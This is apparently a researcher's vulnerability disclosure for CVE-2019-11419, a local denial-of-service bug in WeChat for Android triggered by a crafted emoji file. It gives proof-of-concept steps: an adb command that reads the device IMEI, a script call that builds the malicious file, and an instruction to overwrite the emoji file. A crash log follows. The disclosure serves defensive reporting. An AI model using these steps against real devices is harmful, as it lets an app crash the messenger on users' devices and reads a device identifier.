This DoS bug was reported to Tencent, but they decided not to fix because it’s not critical. The Common Vulnerabilities and Exposures (CVE) Program has assigned the ID CVE-2019-11419 to this issue.
Description:
vcodec2_hls_filter in libvoipCodec_v7a.so in WeChat application for Android results in a DoS by replacing an emoji file (under the /sdcard/tencent/MicroMsg directory) with a crafted .wxgf file. Crash-log is provided in poc.zip file at https://drive.google.com/open?id=1HFQtbD10awuUicdWoq3dKVKfv0wvxOKS
Vulnerability Type:
Denial of Service
Vendor of Product:
Tencent
Affected Product Code Base:
WeChat for Android - Up to latest version (7.0.3)
Affected Component:
Function vcodec2_hls_filter in libvoipCodec_v7a.so
Attack Type:
Local
Attack vector:
An malware app can crafts a malicious emoji file and overwrites the emoji files under /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID]. Once the user opens any chat messages that contain an emoji, WeChat will instantly crash.
POC:
Video at https://drive.google.com/open?id=1x1Z3hm4j8f4rhv_WUp4gW-bhdtZMezdU
- User must have sent or received a GIF file in WeChat
- Malware app must retrieve the phone’s IMEI. For POC, we can use the below command
adb shell service call iphonesubinfo 1 | awk -F "'" '{print $2}' | sed '1 d' | tr -d '.' | awk '{print}' ORS=- - Produce the malicious emoji file with the retrieved IMEI (use encrypt_wxgf.py in poc.zip):
python encrypt.py crash4.wxgf [SIZE_OF_EMOJI_ON_SDCARD] - Replace /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID] with the padded out.wxgf.encrypted
- WeChat will crash now if a message that contains the overwritten emoji file
Crash log:
Process: com.tencent.mm
Crash Thread: 27374(total:122)
Date/Time: 2108-12-12 +8.00 13:34:50.135
Live Time: 35s
Device: Pixel 2 XL android-27
Exception info:
Siginfo: errno:0, pid:0, uid:0, process:
after unwind signal thread
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: google/taimen/taimen:8.1.0/OPM4.171019.021.R1/4833808:user/release-keys
pid: 27147, tid: 27374 >>> com.tencent.mm <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 00000000
after dump thread backtrace
#00 pc 0x0 <unknown> (???)
#01 pc 0x1f739b /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (vcodec2_hls_filter+546)
#02 pc 0x1f8efb /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (vcodec2_hls_filters+134)
#03 pc 0x1efa5d /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (???)
#04 pc 0x1ea94f /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (v2codec_default_execute+30)
#05 pc 0x1f1c59 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (???)
#06 pc 0x1eaa49 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (v2codec_decode_video2+120)
#07 pc 0x1e375d /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (Vcodec2DecodeMultipleNals+176)
#08 pc 0x1e510f /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (CWxAMDecoder::decodeColorComponents(unsigned char*, int)+70)
#09 pc 0x1e5791 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (CWxAMDecoder::add_buffer(unsigned char*, int, int, StWxAMFrame**)+228)
#10 pc 0x1e5995 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (wxam_dec_decode_buffer_3+12)
#11 pc 0x4c435 /data/app/com.tencent.mm-XUPZwNZyUC6RN4utDMIYMw==/lib/arm/libwechatcommon.so (Java_com_tencent_mm_plugin_gif_MMWXGFJNI_nativeDecodeBufferFrame+148)
...